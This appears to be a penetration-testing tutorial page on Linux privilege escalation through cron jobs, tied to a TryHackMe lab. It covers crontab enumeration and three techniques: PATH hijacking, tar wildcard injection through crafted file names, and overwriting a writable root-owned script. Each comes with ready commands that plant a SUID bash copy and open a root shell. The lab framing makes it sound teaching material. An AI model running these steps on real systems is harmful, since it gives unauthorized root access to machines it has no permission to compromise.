# Cron Jobs ## What are Cron Jobs? In Linux, scheduled tasks are called **cron jobs**. Cronjobs are defined in `/etc/crontab` (cron table). If we are able to write malicious payload to a script that is executed automatically every minute or so, then this payload will be triggered as root because of the cronjob. ## Enumeration Enumerate crontab: ```bash cat /etc/crontab ``` For example: ![crontab](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MfjVPVkpwh21revo-wC%2F-MfjXNJj8u33z7kqUa5J%2Fimage.png?alt=media\&token=d4207021-654a-42f3-b7e0-8bef7c932995) Here five asterisks means "every minute of every day of every week of every month, that command runs", hence `overwrite.sh` and `/usr/local/bin/compress.sh` will be executed every minute. If we don't have permission to read `/etc/crontab`, [pspy](https://github.com/DominicBreuker/pspy) can help us identify scheduled tasks as well. ## Method 1: Cron Path Recall the crontab: ![crontab](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MfjeMbkfBkHXQwHADtK%2F-Mfje_o7IJ3Zy_tZNfNS%2Fimage.png?alt=media\&token=de7d6966-a676-4ec0-bf04-c03ba653d84c) Note that overwrite.sh is executed using **relative path** and the `$PATH` variable is: ``` /home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin ``` If we create a malicious `overwrite.sh` in `/home/user`, then this malicious script will be executed as cronjob. Create a malicious `overwrite.sh` in `/home/user`: ```bash echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh ``` Don't forget to give it permission: ```bash chmod +x overwrite.sh ``` Wait a moment until you believe that this script gets executed. Try getting a root shell: ```bash /tmp/bash -p ``` ## Method 2: Cron Wildcard Recall the crontab: ![crontab](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MfjeMbkfBkHXQwHADtK%2F-MfjeeE2IycBJ4Jlc-EU%2Fimage.png?alt=media\&token=08ec53f7-37fc-4162-bac3-89746f9e1da6) Examine the content of `/usr/local/bin/compress.sh`: ![/usr/local/bin/compress.sh](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-Mfjeguxb6w5PgWg04vZ%2F-MfjesLM-eLWOioYFYQ4%2Fimage.png?alt=media\&token=2840c3f7-1707-4125-8a60-0c8328f6096f) Notice the wildcard used by tar. This script intends to backup the `/home/user` directory. Here we can store a privesc payload in `/home/user/runme.sh` and use `tar` injection to let cronjob execute the following command: ```bash tar czf /tmp/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh\ runme.sh ``` Create a privesc payload `/home/user/runme.sh`: ```bash echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh ``` Give it permission: ```bash chmod +x /home/user/runme.sh ``` Prepare `tar` injection part 1: ```bash touch /home/user/--checkpoint=1 ``` Prepare `tar` injection part 2: ```bash touch /home/user/--checkpoint-action=exec=sh\ runme.sh ``` Wait a moment until you believe that this script gets executed. Try getting a root shell: ```bash /tmp/bash -p ``` ## Method 3: Cron File Overwrite Recall the crontab: ![crontab](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-Mfjl1ynTG80o6iSk-Xz%2F-MfjlRpZbA_IbrOoNdPF%2Fimage.png?alt=media\&token=0b8bc393-84e5-4e70-8b8e-e7371d62051c) Examine its permission: ![Permission](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MfjlpNBgudGt5VuLId3%2F-Mfjm4-s-f29NqySjjbh%2Fimage.png?alt=media\&token=1150eec0-d278-4f8c-bc29-ff02f3fda882) Since this script is owned by root and it is executable, we can simply append a privesc payload (or reverse shell payload) to this file and wait for cronjob to execute it. Ovewrite /usr/local/bin/overwrite.sh with a privesc payload: ```bash echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh ``` Wait a moment until you believe that this script gets executed. Try getting a root shell: ```bash /tmp/bash -p ``` ## Challenge: TryHackMe - CMesS {% embed url="" %} TryHackMe - CMesS {% endembed %}